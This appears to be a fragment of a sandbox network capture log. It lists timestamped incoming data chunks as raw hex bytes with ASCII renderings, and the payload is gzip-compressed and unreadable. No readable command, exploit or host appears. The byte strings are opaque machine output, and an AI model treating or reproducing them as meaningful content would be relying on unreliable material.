                                              2023-09-05 23:45:27 UTC495INData Raw: 1f 8b fd a9 16 4d ce 87 df 43 bf 8d 31 ce 38 a3 15 61 bd af 1e 59 29 b3 4d bf 22 6b ea 13 ad 61 e6 5f 3d 34 a7 4a 71 4d 85 e5 3f a2 cc 6e 68 36 8e 6b 8a 1d c9 9c 98 10 9d 50 ff 1a 20 10 09 9a 32 a0 3b 89 33 0c b3 67 82 34 01 1e d5 8d 5a d0 a6 d3 a9 a7 47 5a ec 6b 28 6d 8d 0c 70 b6 76 ab eb a6 0c 72 69 5a 11 46 cd 7d 8a b8 8b 69 3a c9 2f eb fb 9a 10 1d 8c 63 7a 50 9f c5 75 56 c5 51 39 45 8d d2 26 27 cc 2f ec 0b 87 91 76 e5 9c f2 ad f9 04 3c 80 32 86 df f4 db 8a de f6 8c 16 85 e9 59 51 29 82 6a 2e 1a cd f8 48 4e ac fb a2 da 17 31 31 99 73 cd d5 ca 97 ad e9 92 e7 d8 8b e0 7b e6 0d 9d a5 27 7c ad 6b 83 aa 6c 54 ab 25 ef 31 f2 ea aa 8b 1d 43 a5 cf dd 67 f6 51 55 4a 5b ee 27 f2 c4 55 fa d8 94 fb cc 9d 97 d6 b6 7b bf 38 31 e9 20 1f 8a 8d 72 a5 6e 9a ef e2 9a d2
                                              Data Ascii: MC18aY)M"ka_=4JqM?nh6kP 2;3g4ZGZk(mpvriZF}i:/czPuVQ9E&'/v<2YQ)j.HN11s{'|klT%1CgQUJ['U{81 rn
                                              2023-09-05 23:45:27 UTC497INData Raw: ad ec c2 cb 1f 78 fc 0b f7 b3 7d c4 36 66 ad 73 d0 17 28 c4 b0 53 c8 cb 1b ee 65 7e 01 34 9e 04 55 d8 e0 e8 29 11 d3 43 31 e5 69 8b 73 25 43 f5 ac 72 a3 1a 48 22 f7 33 d8 e6 0e da d8 83 1e 29 09 94 8b 4c 5b d8 e8 d3 a9 29 cc 6d 6a 0c 14 a5 01 e6 03 55 ed 86 1b 03 db d9 9c 22 fc fe c5 d9 49 89 a7 52 0b f0 b7 c6 36 cd 57 33 ae 96 6e 50 a5 d7 d1 48 8d 87 b5 d5 df 9b 35 51 37 73 5c ea 40 bf 8e 13 53 77 95 af ae 52 68 14 c6 84 f8 65 71 ea dc 8d 47 30 3f de bd 7e fc d8 91 5a 1b 3e d5 0e de d6 02 47 4c ee ee e5 db d1 c5 63 01 5b c3 64 fd 4e 0a 8d 25 43 39 8b 58 a5 3c fa 51 ed ed 5e 69 f9 bb da ef 8b 70 2c 55 20 c8 91 14 17 0b 1f 54 c3 89 f6 7e 91 ed 55 ae 32 17 28 27 77 7c d6 2f 9a ab 42 33 14 00 c2 ea b1 d7 e8 e7 4a 08 2c bb 74 0a ea 1e dc f1 ac 57 67 4c 4e 24
                                              Data Ascii: x}6fs(Se~4U)C1is%CrH"3)L[)mjU"IR6W3nPH5Q7s\@SwRheqG0?~Z>GLc[dN%C9X<Q^ip,U T~U2('w|/B3J,tWgLN$
                                              2023-09-05 23:45:27 UTC498INData Raw: 0b 7b 32 da ac 43 8d 1b fe 1b ab 4f 19 bd a2 e5 a2 b8 d3 fb ff 90 4e d9 98 7f c3 40 2e 8b d4 57 d4 31 05 44 b1 07 7a 1c 5b 10 c1 b0 e2 5b b0 4d 25 56 e6 35 ec 72 21 34 26 55 99 72 ab 0d 73 e2 a0 37 25 79 7f 00 e7 4e d9 4a 28 3f a5 6e 59 6d 89 1e 22 54 13 fa 43 8d 4d 6d 72 fb 2e 04 ee 98 dd b4 7b 62 53 4e 54 8c 1d ec 5d 2a 19 7d e8 92 1b 76 60 aa a4 98 fb a2 95 31 ea 5e 48 9d e5 ee 8b d3 76 93 4e 6f ee 55 db 86 41 53 36 57 99 4f d9 89 65 0b 5b 28 da ce 42 11 03 e5 a2 cd 9d 1e 85 74 6f 31 62 cf ab 15 5a 48 82 e7 bc 7b d1 c0 f5 a4 7e cb 4e 80 7d 56 1d cb 8b d9 b9 00 6f b2 92 15 3c 8b 3e 23 c7 fd a2 6f aa f0 ee be 54 46 44 22 ef 1b 25 37 ef 33 ae ac d7 2e f5 28 3f 15 be 66 b7 92 83 8a e5 e6 5d df d2 f5 60 21 f5 9c c0 b1 fc c0 bf bc 31 25 55 ef f4 71 4c 3a e8
                                              Data Ascii: {2CON@.W1Dz[[M%V5r!4&Urs7%yNJ(?nYm"TCMmr.{bSNT]*}v`1^HvNoUAS6WOe[(Bto1bZH{~N}Vo<>#oTFD"%73.(?f]`!1%UqL:
                                              2023-09-05 23:45:27 UTC499INData Raw: 0a b1 5e bc 47 76 cd 8a a2 ca 0f 53 41 34 8a 3a e4 44 c1 04 49 81 06 f9 de 03 af ca af 91 f0 e8 3c b8 0b 96 21 2e 94 31 3f 1e 6e 54 e5 9e e0 19 c8 7a 1d 07 68 d4 93 e5 b0 b5 0c 9f 5a 88 42 e4 18 aa f2 a9 17 96 ce ef 87 af 43 6e 16 d2 ee 97 b5 1f f9 ee 49 9d 9e 00 f8 8f b3 89 7e 03 2b db ef 73 02 6d a6 38 b9 54 7f b0 c5 3d 66 21 63 b7 28 9a 4b 1b 48 f7 8a ea 83 53 ad cb e8 48 37 21 4c f0 53 bf 2e 44 c4 02 34 e7 8b 24 fe d9 7e 5d cb da d9 b4 61 bc 47 e9 02 9a 73 af 69 08 4b 37 90 c0 e0 22 7f 64 cf b8 7d bf ac 89 b5 9a 7c 9f 7b 9d a9 d8 dc b0 51 92 37 de 72 2d 0f ca 1d 79 a7 fb c7 e0 88 cc 82 7a ab 15 52 61 56 ce 5d 08 76 34 74 bc 96 9e a0 8f 8b bf b0 05 32 fa 08 ed e4 04 fa c2 2d e6 c7 e8 ae a8 59 44 8e db 8c 19 ed 53 d8 40 aa 25 5f d1 42 28 46 d6 13 e3 dd
                                              Data Ascii: ^GvSA4:DI<!.1?nTzhZBCnI~+sm8T=f!c(KHSH7!LS.D4$~]aGsiK7"d}|{Q7r-yzRaV]v4t2-YDS@%_B(F
                                              2023-09-05 23:45:27 UTC501INData Raw: 8f d1 ef 2f b5 f0 5b cd 04 b7 75 0e 54 4f 62 0e a4 8b 44 3b 13 43 d8 b7 63 02 8d 45 bb 96 bd 45 c6 54 53 71 c3 dd fc 68 33 64 94 db 2d 7b 05 fc 66 58 70 16 c4 c3 f0 36 a7 ad 68 0f 5d a2 b9 db 56 a3 48 61 33 3c ad d5 dc 00 76 99 d4 4a 40 58 a6 e2 e9 be e7 f6 cd 4d c4 7a 64 52 ca 4c 62 05 a3 33 a2 91 2f 98 02 f4 08 98 87 b8 64 7a a8 22 97 f8 f3 3f d4 80 03 1f 67 da 3a 44 5f a5 1d d1 c2 50 a8 be 37 bd ad c2 5f d9 a0 cb 53 63 15 7d be 15 a1 96 c2 ff df a8 f4 ca 95 fc 30 90 24 f9 9d 30 02 a5 a0 73 fb bb e0 9b 4d 47 25 5e fb 96 58 e2 c9 03 35 d3 dd fe 54 6e 3b 9b bd c0 3e 26 02 11 54 a6 04 3c e5 8d 16 99 29 33 08 53 66 56 31 f3 e5 da 93 27 ac fd d4 76 68 92 ca ca 44 e6 f4 a4 fc 0b ee 6e 86 24 34 6e ab b5 b7 27 dc 72 7d 62 12 30 ef e4 44 db 78 6f fc 56 ea 0b c1
                                              Data Ascii: /[uTObD;CcEETSqh3d-{fXp6h]VHa3<vJ@XMzdRLb3/dz"?g:D_P7_Sc}0$0sMG%^X5Tn;>&T<)3SfV1'vhDn$4n'r}b0DxoV
                                              2023-09-05 23:45:27 UTC502INData Raw: e4 20 12 4a d6 ca dc 4f 9a af 27 56 21 89 99 22 b7 12 b0 3d 89 24 15 0a 0d d1 97 34 84 c2 f8 4b 53 ba 2b ea 91 c2 ca 26 5a da db 99 83 91 27 a4 e6 86 a5 59 8e 0e e0 d0 5e db 16 b7 05 65 be 05 02 cc e6 7e ff ff f7 7d e2 96 2c 85 c2 78 27 22 73 a3 6f df ae 64 b1 c7 fd b1 1f a3 df bd 7d 7b 2e 08 e7 6b e8 c8 c8 54 4a 59 3b 66 66 ea 96 ef 85 8e d7 6a a7 4b 56 92 b8 1c bc 42 ef 2b d1 f6 6a c5 dc 01 1d 71 4d ae 57 4c af 22 9b 1b 65 f5 2f 9d d7 b6 bb df bb 59 66 99 fd 8c f4 78 77 a2 49 f5 f2 3a 6b eb 91 49 eb e8 71 2e 86 87 c7 b2 08 9c 64 4c 57 69 6d ee fc b8 b3 5d 1e 00 c9 97 f5 c2 c7 fb 5d 0d 66 cf e2 b8 29 82 42 e1 ea 7b 6c b2 d6 bb b7 c1 1d 60 ee 8c b1 ca 6a d6 7e a3 de 86 de e9 af 3b c4 81 3b 7e ad 37 b1 c5 2d 7a 41 c1 ef d8 d7 58 c1 27 ac ce 0e 74 62 9f 8d
                                              Data Ascii: JO'V!"=$4KS+&Z'Y^e~},x'"sod}{.kTJY;ffjKVB+jqMWL"e/YfxwI:kIq.dLWim]]f)B{l`j~;;~7-zAX'tb
                                              2023-09-05 23:45:27 UTC503INData Raw: 9f 12 5c 1b b4 87 91 47 17 ce f5 9a 36 24 de 05 b0 24 92 b8 75 50 3d 07 6f e7 75 38 37 bf d4 1e bd ec 9d 5b 9e 25 3e 60 3c 15 0e 9e 2e f7 cb 24 c7 4d 74 d3 97 b6 42 29 47 aa 6a 53 ae 51 e3 e6 c6 55 64 fc 60 8e e8 53 b6 22 b8 a7 1f 33 b7 99 1d c9 bd 85 7d 4d d7 b1 b3 54 0b 74 68 3f f4 17 37 9f b1 06 ed 5d 9b e1 d0 f7 84 f2 97 69 a2 45 48 e5 15 89 9f 7a c5 9f fd e5 7c 15 a7 2d 9f c1 19 14 d5 74 64 86 a7 bf db 91 2c fd 3a cb 44 cf 07 9a 1b 92 a9 16 d0 6a 37 6c c1 dd 04 44 00 36 d9 a7 17 2d fc 86 8f 02 b7 d4 c1 2b a7 7d 5a 55 34 9f 5e ae e7 78 4f b5 dd bc 9d 9f 66 c5 fc d8 51 1e 48 f8 1b 14 10 0b 8d c2 ea 55 3b 22 49 7b f7 29 91 dc 31 85 04 8d 5a c0 b0 f8 1a 2e f5 d8 17 c5 07 e1 94 12 40 f3 88 9b 32 f3 84 96 a9 62 03 2b 71 ba 7a f3 56 f0 9b 0b 81 73 5e c6 3e
                                              Data Ascii: \G6$$uP=ou87[%>`<.$MtB)GjSQUd`S"3}MTth?7]iEHz|-td,:Dj7lD6-+}ZU4^xOfQHU;"I{)1Z.@2b+qzVs^>
                                              2023-09-05 23:45:27 UTC505INData Raw: 7d 1f 69 53 68 87 52 6d d0 e8 5d 1e f9 d0 15 36 3b f4 a8 9f 96 8d da 3f 27 af ac f2 04 83 42 7d 67 c5 d9 4d ab 6d f4 ee c7 9e eb ec cb 43 6a 2c 76 b4 9c cf d4 b1 af a0 3e 89 fa a7 0f 97 47 f0 c0 16 7f 92 2b 7a 59 6c 3f 47 e8 dc a6 2a 7b 82 b1 12 2e ec 6d 37 e4 41 c7 54 aa 5e 31 44 e5 22 a5 3b 52 8e 55 72 f0 a0 10 84 22 62 68 f8 a6 0e 6c 71 77 24 92 b1 d4 2f 67 79 be 52 bf 6d 5a 70 87 25 14 8b 30 42 ce 15 cf 9d 23 34 ff 62 c1 e8 e8 5c 71 30 6e ed 08 09 ee 4e 5d 4d 89 3c be 71 eb 88 ce 4e 97 d4 f5 7b d4 88 86 cd 68 cc 40 fe fc 31 3f bb db 7e 8b 74 f9 f2 c0 ea c2 36 cd 9c d8 da c1 54 9d b8 6b a7 8e d5 cc 86 0f 1e d2 99 19 0f d2 87 fb 5c 4d 08 00 e5 7c c0 74 20 10 d3 35 4f 3c 34 3e 20 4a 0e e7 7d be de 19 2c ff 51 1d 72 51 2a cd af f6 9b 41 5c 15 27 f5 29 79
                                              Data Ascii: }iShRm]6;?'B}gMmCj,v>G+zYl?G*{.m7AT^1D";RUr"bhlqw$/gyRmZp%0B#4b\q0nN]M<qN{h@1?~t6Tk\M|t 5O<4> J},QrQ*A\')y
                                              2023-09-05 23:45:27 UTC506INData Raw: 25 e9 ed 20 7e 29 09 7e 8e 12 83 58 4c b7 74 cb 9b dd d2 85 96 8e 4a 06 4b dd 2f 2f 28 97 46 5b 0c 98 4b 59 3d 3b ca 1f ca d8 95 62 ff fa 97 83 7e 24 56 64 b8 5d 9a a2 38 da dc 7c d4 f7 1a 02 81 62 4a d3 16 29 3a 76 20 ff fa a3 18 33 52 86 52 97 51 b4 8f 04 7d cb ba e4 7f 4f ed 0c d6 09 6b 06 c5 55 50 c4 c1 8b 7d b3 9f 53 56 95 af fd 0c cc 7f 78 7f 73 00 51 ca 72 6f af b1 9f 33 1e a3 ff 7a e7 90 32 89 46 10 a4 8c d2 fa 27 d6 af a3 d8 dd 6e 4e 3f f0 1e d7 7b 22 5d f5 31 16 42 2b 1f c4 d5 b5 a5 0d e3 b0 3b 2a ab 0a 8a ed d1 65 4f 5d c2 dd d6 2d ce d2 4e 7e b5 bf f8 32 f5 cc 9c f2 a3 75 25 6c c5 28 5a be ad bb a3 9d 62 7f a1 39 4d 99 68 5d 5a 1f 0e 33 27 29 a2 14 39 a0 23 87 3e cc 2a d7 03 3c 63 8c 3b da 1c d4 9a 7d 6c 3e e2 a7 fb 25 fb 29 b7 56 60 10 6c 65
                                              Data Ascii: % ~)~XLtJK//(F[KY=;b~$Vd]8|bJ):v 3RRQ}OkUP}SVxsQro3z2F'nN?{"]1B+;*eO]-N~2u%l(Zb9Mh]Z3')9#>*<c;}l>%)V`le
                                              2023-09-05 23:45:27 UTC507INData Raw: 9d dc 5d af 88 19 7a 60 40 f8 95 44 51 68 97 cc 04 e6 36 66 b2 9d 16 95 1c 7e 68 ab 47 a9 35 c6 75 55 04 37 47 e4 f0 ed eb b8 c4 15 7e f7 0a c1 b8 e3 f5 2e 88 23 33 f1 50 13 0b 8e fa 54 56 ca 21 bc 1f 6e 7f ac af ef da 98 05 50 66 36 a0 d5 89 3e 6c db 36 09 39 40 dd d2 96 f7 a6 99 1e 8f a5 02 e0 35 cf 9a 36 32 f2 f9 74 40 37 0a 9e e1 4c 8e ce 32 09 1d f6 d7 17 20 74 fc f5 ed 27 d4 af c0 62 48 ca e4 ef d4 bc 01 88 77 12 cb e6 57 66 f2 f1 b7 c9 8a 37 3d cc db fc 2e 3d 62 78 0d 25 05 64 3f 0d ba 7f c1 ee 8d 61 b3 ca cb 20 92 39 e0 65 ff 70 90 a7 8b bd 48 8f d2 a9 0c 4b c8 e5 f7 5c f0 90 c5 db 8f fb 9d 84 9e 84 8c 24 a0 b0 98 e3 9b 43 25 96 30 a8 96 1c c1 e6 0d c9 c6 ca 05 e6 83 01 9d dd 6e 74 76 a3 bc 3a 80 b5 4d c8 60 e1 b3 91 42 84 8d db 61 73 70 93 26 0b
                                              Data Ascii: ]z`@DQh6f~hG5uU7G~.#3PTV!nPf6>l69@562t@7L2 t'bHwWf7=.=bx%d?a 9epHK\$C%0ntv:M`Basp&
                                              2023-09-05 23:45:27 UTC509INData Raw: 40 b7 84 cf 01 06 94 d6 10 47 69 c0 3c 4a db c4 3c 7b a6 c9 7a d3 e5 01 9f 0e 0b de a2 4d d6 7d a0 0c 61 9b cf 21 42 65 3a e1 dc 8d 6f b9 60 2d 93 43 5c d8 2e 79 6b ac 1a fe 24 03 f6 ec 82 65 78 c7 b3 80 4e f0 48 95 01 1e d2 e8 90 28 81 cb c8 5f 8c a3 bd 9d 01 21 cb 4b 46 b3 ab d7 08 6f 74 76 57 d5 d8 77 2d e5 c4 73 b4 4c 00 d2 3e 89 cc 5d 39 62 f3 b0 09 88 4a 6e 12 99 29 73 6e 9c 74 5f f2 f2 19 eb 5f 0f 78 45 4b ad 94 44 94 06 20 a5 bc 42 09 99 24 67 59 98 41 bf 56 3e 1f 67 24 95 25 4c d0 30 4c 23 ee e3 7b 1b 26 ce 9d 98 96 46 74 0f 64 eb 5c c0 a5 50 94 13 3d 9c d2 1b 61 34 e2 ca 0d 8f 1f 0f 38 22 9c 3c dc 9d 8a 8b 73 fc 4c 5e 5e 4e df dc f2 45 63 9c c7 76 b9 ac ed 48 2d 5f 3e e9 97 f2 a7 f1 d6 8b d8 da f8 02 3b 7c 2b 87 63 a9 c8 21 8b a9 04 bf b6 bf de
                                              Data Ascii: @Gi<J<{zM}a!Be:o`-C\.yk$exNH(_!KFotvWw-sL>]9bJn)snt__xEKD B$gYAV>g$%L0L#{&Ftd\P=a48"<sL^^NEcvH-_>;|+c!
                                              2023-09-05 23:45:27 UTC510INData Raw: 32 db 40 e7 4a ca 48 05 95 53 e1 16 1e f6 14 3e 21 7e f5 16 9b 4c e9 5e 64 1b 10 09 98 e6 72 c0 d2 35 2f e7 1d 90 47 79 4e 0f 57 fe 08 2d f5 60 05 a4 b1 1b e2 e4 c9 9a 4c 4a 03 9e 8b 3d a9 d4 28 52 a5 56 32 c3 c8 8f ec 4d 3b be 3a 8b 2d cf ec 41 08 30 3c 19 c8 a4 09 4c c3 07 31 4c 3c 46 28 d2 4a ee ad f4 14 4c 0e 86 ee 43 6c a8 59 f7 f6 c3 4e 8f fc 03 5f 37 ed 00 3a 2a 95 5c 38 cd 8f de 77 08 a0 ea 0b 0d 64 35 27 4c b2 df cf e5 a6 ee f5 48 f7 73 35 4d 20 9e 32 49 44 8e 25 9e b6 57 50 5c 70 79 72 a2 7e 85 83 d2 8d e9 29 71 4e 30 07 c5 45 f7 7c 29 89 28 f5 40 01 fc d6 28 22 3b 91 4a 47 5a 90 21 a3 a3 97 55 a5 db 2c 57 4c 8a 23 45 d7 ac d2 45 b6 ad 84 87 1c 18 99 4f 35 2e 4b fa c1 91 b1 91 a6 f9 99 53 6c 73 6f 02 8c c5 7a 89 64 92 13 37 e3 e9 d3 b3 3b 25 05
                                              Data Ascii: 2@JHS>!~L^dr5/GyNW-`LJ=(RV2M;:-A0<L1L<F(JLClYN_7:*\8wd5'LHs5M 2ID%WP\pyr~)qN0E|)(@(";JGZ!U,WL#EEO5.KSlsozd7;%
                                              2023-09-05 23:45:27 UTC511INData Raw: 78 69 20 4f b9 05 20 95 8a 78 7c 2b 5e 8b c3 b1 b2 43 71 01 25 84 7f 03 e6 b8 5d 7b 5b 5b 1b 1e d8 71 22 9a 09 dc 78 40 4c 07 d6 75 70 d5 94 1d d5 c3 6a bb ea 83 0b 0b dc d6 2d 01 dd e8 a3 5b 3d c9 7f 8b c0 f5 93 d8 a6 b2 5c 0c f1 65 89 8b 6a 71 5b fe 25 ef 1c b3 5e 57 a5 87 94 1a 19 27 e2 48 6a d3 79 c2 63 ea f4 25 4a 38 8a 18 49 6d 78 95 c2 e5 3d e8 43 2f fa 5d 2e 26 c1 77 34 cd 44 de c3 2c c6 98 17 ce 13 ca 1c 33 f9 b9 ea 94 22 b6 7a 96 14 9f 83 60 c5 55 a9 90 16 ea c1 0d 7c 4d 3a 1f 33 51 63 21 93 5f c7 a3 e5 f1 57 28 01 18 57 6a 87 90 d3 f9 71 eb d6 53 f2 23 66 28 47 34 47 de 97 49 3e b4 a7 d4 e0 85 e4 6e d5 da 84 45 92 06 0e fc d9 a9 ff f7 8d f2 5e 84 9b 92 80 e6 97 cb 97 8b da 3c 44 24 3e 6e f1 48 47 5b c7 16 4d 89 27 c9 43 d4 26 92 c7 b8 27 6f f8
                                              Data Ascii: xi O x|+^Cq%]{[[q"x@Lupj-[=\ejq[%^W'Hjyc%J8Imx=C/].&w4D,3"z`U|M:3Qc!_W(WjqS#f(G4GI>nE^<D$>nHG[M'C&'o
                                              2023-09-05 23:45:27 UTC513INData Raw: 3d 65 1e 1c 89 c4 48 2b 5e d1 97 ba c5 de ea 61 2f f5 47 85 13 36 8c 7a d5 3c f0 36 29 79 d0 b6 87 e5 44 48 e4 77 46 cb cf f3 e3 13 76 e5 fa fa 32 6e 46 bd 29 25 c3 64 f8 f3 ef 03 b9 ee 2e 9d 29 e1 08 14 c6 db 95 50 36 5e c3 b7 72 09 8d e3 04 7b aa 68 f7 c8 3c 8a 4c ca 3f b3 49 68 2e a7 b7 98 8e b4 64 68 74 5b 24 9d e5 1e e3 16 5d 09 ec e2 b2 66 c5 98 b0 39 26 34 2e da 3b 00 e6 73 3b 8f 42 8c af 95 fd f6 0a 12 9a 6b f6 f5 19 dc e6 f5 f5 95 7e cf 3e a8 6a 29 cf b0 79 22 54 cb e3 9d bc 6a bd 4d 55 1b 81 02 e9 64 ce 82 4d bc dd b1 ad b4 5b ff 84 44 f1 67 34 0f 7b 1a 2b e1 dd 9d 1f a9 8c 02 a1 17 3a aa 3c 83 39 71 a9 02 b7 01 fe 41 cf 7f 14 02 05 7f a1 15 77 07 09 4c 7d bb c5 41 3d c2 a3 36 13 1b af db a0 65 76 f8 dd 41 75 11 94 2b 55 fa 5f ff 1f f6 51 de 33
                                              Data Ascii: =eH+^a/G6z<6)yDHwFv2nF)%d.)P6^r{h<L?Ih.dht[$]f9&4.;s;Bk~>j)y"TjMUdM[Dg4{+:<9qAwL}A=6evAu+U_Q3
                                              2023-09-05 23:45:27 UTC514INData Raw: eb e9 dd 1a 06 bb fa 2e 74 8a d7 a9 3a ea 4b 16 49 54 27 17 81 36 98 1a 95 ca 6d 37 98 d2 22 f2 3a ef 1a ec e2 be 73 07 03 c5 62 12 c7 71 d7 79 4c e2 40 5a 2c 59 af 09 62 67 98 8e dd c5 2c c1 fe bf 6e 9f 06 fb 89 98 7b 0e 4f b8 3b 5d 93 c9 aa 21 5f e3 22 3d 63 17 f8 d3 ba 02 86 9a 82 64 69 6a 9b 32 a4 47 ec 42 bf 58 b5 24 80 e3 b5 e0 7c a9 ab 17 7f 69 db 21 b1 a1 82 2a 6e 54 ee 01 25 9b 02 13 fb 3b cf 15 2a ea c5 f6 e4 5e 33 ce 2f 63 ed ae b9 45 c0 9f 13 73 9f 08 34 f6 ba 43 03 77 4c 6a 7d 29 19 b1 f9 e2 3c 28 86 9e 59 70 48 77 e2 dd f3 57 8b 5e 92 fd 48 4c 8c 2d 0b 76 cb db 70 84 f9 c4 91 40 01 77 de c4 d0 9f 70 c5 cc b9 9d 55 fa 4b b8 97 c0 a1 3e 31 eb b7 80 f1 c4 4c cb be a9 66 e2 04 30 70 89 d0 ce 8e 97 1b 3d d4 5f eb 8c f1 9f 21 0b 09 39 fe 71 c6 5b
                                              Data Ascii: .t:KIT'6m7":sbqyL@Z,Ybg,n{O;]!_"=cdij2GBX$|i!*nT%;*^3/cEs4CwLj})<(YpHwW^HL-vp@wpUK>1Lf0p=_!9q[
                                              2023-09-05 23:45:27 UTC515INData Raw: 99 c1 d7 18 b3 b1 b2 f0 05 e9 bf fe 37 9e c9 07 91 bb 25 66 22 a5 59 89 16 93 15 8d fb 3e b6 92 d9 d0 a8 47 5d dc 54 7d ea 5f f3 e2 fa 9d c3 ea c8 54 18 c4 2c 61 7f d2 ec df 5e 26 78 d4 a0 ab 91 e7 2c 76 a5 34 98 45 70 57 f0 c2 b6 9f f2 53 84 41 14 fd 4e ef e2 85 ad 08 67 6a de 29 de c9 ec e2 26 aa 8a 64 99 00 0c ba 35 0b b8 34 ad 7f e4 fe 28 da 04 08 e7 e4 24 c1 fd e3 73 44 e2 42 dd a6 78 9d f0 4f 9f 68 11 aa 58 51 9f cc 4c e2 b2 77 98 05 8a 60 ed 1f 71 8e 6e 1d 50 ee 88 73 54 a1 17 73 db d5 27 40 c7 54 7a c0 bd 2c ed 32 1f cc e8 4a b5 2a 6e 6a de 88 fb 34 5f 98 7d 33 b9 b8 17 9d 9c bb d7 99 c7 6a c5 d2 ab 2d ab 25 69 f9 a8 f2 a5 bd e9 0a 80 f2 b7 01 bd c2 50 92 4f f3 a4 46 3f 8f ad 6b 6a 53 db 23 ed 07 04 47 fa 27 eb ca 70 1b f6 31 e6 8e 1d bd 4a c3 18
                                              Data Ascii: 7%f"Y>G]T}_T,a^&x,v4EpWSANgj)&d54($sDBxOhXQLw`qnPsTs'@Tz,2J*nj4_}3j-%iPOF?kjS#G'p1J
                                              2023-09-05 23:45:27 UTC517INData Raw: 31 c2 c0 53 54 4b 89 61 66 d4 3b a2 0c f8 d9 33 60 17 4c 98 b0 7d e4 8d 7b d8 a7 4a 11 26 35 b3 80 b1 c4 d9 ea 4a 84 5e b7 fc f5 b4 47 bd 8f 86 a1 86 eb 26 f5 f6 9e 78 ad ee b2 25 6e 86 71 23 23 e9 47 b3 a1 37 96 a4 ff 70 28 2f 38 f9 84 9d d7 ca b6 4a 1b 47 79 d1 1b be f6 38 d1 3f 96 a4 ff b0 c8 2b 3e 49 08 b4 a5 ae f8 8f 10 e5 85 8b 57 e2 bb 54 dc 6d 0a 41 6a 98 f7 2f 62 88 07 a6 88 b3 59 46 4e 47 ff 75 17 63 fe 04 f7 b5 8e 5c ae c1 8b 88 cf 3a eb 69 25 ba 96 e1 66 55 2c 70 17 e6 82 49 ec 8d 70 20 ff 96 5e 79 b6 eb 95 1f 08 f7 42 c0 63 78 c2 32 8a d0 ec 1b f7 ca 16 0d 56 62 e0 a7 36 4e 01 bf 64 0b d6 d9 8d d3 99 54 80 e4 e6 9d 6c 14 c6 57 86 7b 74 c4 88 54 7b f0 96 e8 53 11 1e 2f a5 51 95 59 fe a5 4b fd 8e 15 d5 37 b7 e4 23 12 ae bb 70 16 51 63 47 6f 91
                                              Data Ascii: 1STKaf;3`L}{J&5J^G&x%nq##G7p(/8JGy8?+>IWTmAj/bYFNGuc\:i%fU,pIp ^yBcx2Vb6NdTlW{tT{S/QYK7#pQcGo
                                              2023-09-05 23:45:27 UTC518INData Raw: ca b9 8d 60 ce 7b 36 c2 81 70 d8 53 a4 fb 9a 75 41 eb 9c 6d 6d 16 8b 47 83 70 3c 10 ed 99 dc fa 73 f8 4f 69 63 30 02 ca b6 82 75 bf 18 f8 05 9d 94 9c 66 1e c2 35 6f 23 0f ac 92 9c 92 1f da d5 2e ef 6f 5d 85 6c ae 3c 28 7f 49 eb d5 96 2b d0 20 5b 14 44 2d 96 b1 d3 12 64 a1 f1 04 bf 71 1d ea 9d bb e1 29 19 cb 3c 55 50 71 79 6f 51 5e 34 39 4b 1c 9b 12 23 09 2a c1 bf f1 25 5e fe e6 f6 8f 22 56 1f 76 84 1c 2a 2d c2 e6 ea 73 d9 79 31 22 4e a4 21 c3 34 c6 08 f0 5c 55 24 d1 9f ca 8b 5b ad cc c0 4d 7d 81 df 91 4f be 7f 72 02 3d 99 f5 4b 2d 91 07 0a 89 bf 38 32 49 e5 ad fe de 2b 91 08 ca 28 b1 1d 59 64 6d 68 af a6 c5 90 88 9c 05 4c 61 a0 bc 24 55 99 54 97 ae 0a f6 94 43 f7 28 06 0f 04 be da e5 8a 1d 8e 1d 27 20 48 28 04 78 0e 08 19 cb 15 b5 0a f6 03 03 ca 3d 9e aa
                                              Data Ascii: `{6pSuAmmGp<sOic0uf5o#.o]l<(I+ [D-dq)<UPqyoQ^49K#*%^"Vv*-sy1"N!4\U$[M}Or=K-82I+(YdmhLa$UTC(' H(x=
                                              2023-09-05 23:45:27 UTC519INData Raw: 79 0f 75 71 82 eb a2 b5 d9 c2 08 cc fa d6 f0 90 a0 b5 fa 99 a7 8d 8d 9f 99 d5 8c 3d c6 b6 9f 13 9b 54 dc c2 b7 6e 32 70 ad 12 b9 bf 61 41 1d 2f e1 46 5b 0d 5d 2b 70 5e b6 b5 46 b5 17 9b c4 28 ca f3 fd c2 3f c9 ac 33 67 67 01 f3 b3 f5 d9 0e 04 ec 51 29 b4 01 c3 c4 c4 8a b5 0e 44 4c 6d 34 f7 98 47 3b bf 3f 38 31 d7 5b d1 ab d4 54 d8 3e 20 3d b1 51 38 1a e3 13 aa 29 ca 92 de 35 c1 a8 63 6b 2b 67 64 52 be f6 00 86 88 1d c3 12 41 7c 86 76 e4 ec fd 61 ea ae 6b 42 63 7a ff ed e5 5b 95 e9 c9 43 38 94 5e 27 b3 d5 a4 86 d4 cf 4f 07 80 53 30 b7 83 2a 20 29 9b 35 72 8f eb 7c 9f 80 c8 a4 8a 93 5e cc 3f f8 7a 7d b7 5b f0 a2 c0 81 53 57 07 55 f7 bd 1e f6 1b b1 04 ec 54 7d 1a 81 8d 3f 4c d7 c0 f6 f9 0e 55 cd 5e bb c0 8c cd 7d 18 4c 09 d2 36 68 b8 38 db 0d ee 62 e2 8d c7
                                              Data Ascii: yuq=Tn2paA/F[]+p^F(?3ggQ)DLm4G;?81[T> =Q8)5ck+gdRA|vakBcz[C8^'OS0* )5r|^?z}[SWUT}?LU^}L6h8b
                                              2023-09-05 23:45:27 UTC521INData Raw: 5d f0 5d e6 e6 fe 59 20 ee 1d d6 4d 47 2d 57 4d a8 c6 d5 5f c9 09 4b 0f e3 a6 c7 e9 56 a4 67 47 67 17 c7 e4 e3 d3 3e 84 95 dd 57 26 fa c2 19 19 69 bd 26 0d fb 0c c9 99 db a3 ce ba 35 cb 58 98 6e bc 13 d6 17 46 3e 67 6c 61 d1 e2 a7 b2 8f 30 c3 e6 11 c2 78 29 7b 93 e5 1b e2 38 dc dc 7d 3e 3b 7c ce c4 39 09 69 b8 20 37 3f c4 c9 6b 4e c1 bc 1b ce c1 57 b6 bd a6 e6 ff 16 e2 b3 fc 20 f9 d5 41 f2 f2 50 f9 45 6a f6 87 70 e5 a6 59 d2 72 d2 8a d2 13 f2 1d 92 4a 16 e1 12 70 18 37 c3 7e 56 a1 bb da c0 b7 38 e0 b4 cb 6f 9f 3f 97 a3 da ef bb cb d7 fe eb 20 87 ab da e7 ad fc 33 23 4a 46 09 3b 53 6c 36 10 51 41 80 69 12 dd 7f ab 04 a4 f1 05 43 df 0f ec 66 7f 54 30 59 f2 77 1e 02 c2 49 fb f7 b4 2b 7e d4 1e b4 5b 97 b0 6b 42 1d b1 05 e2 93 34 d1 31 4c f9 a8 5b a1 2a f3 c6
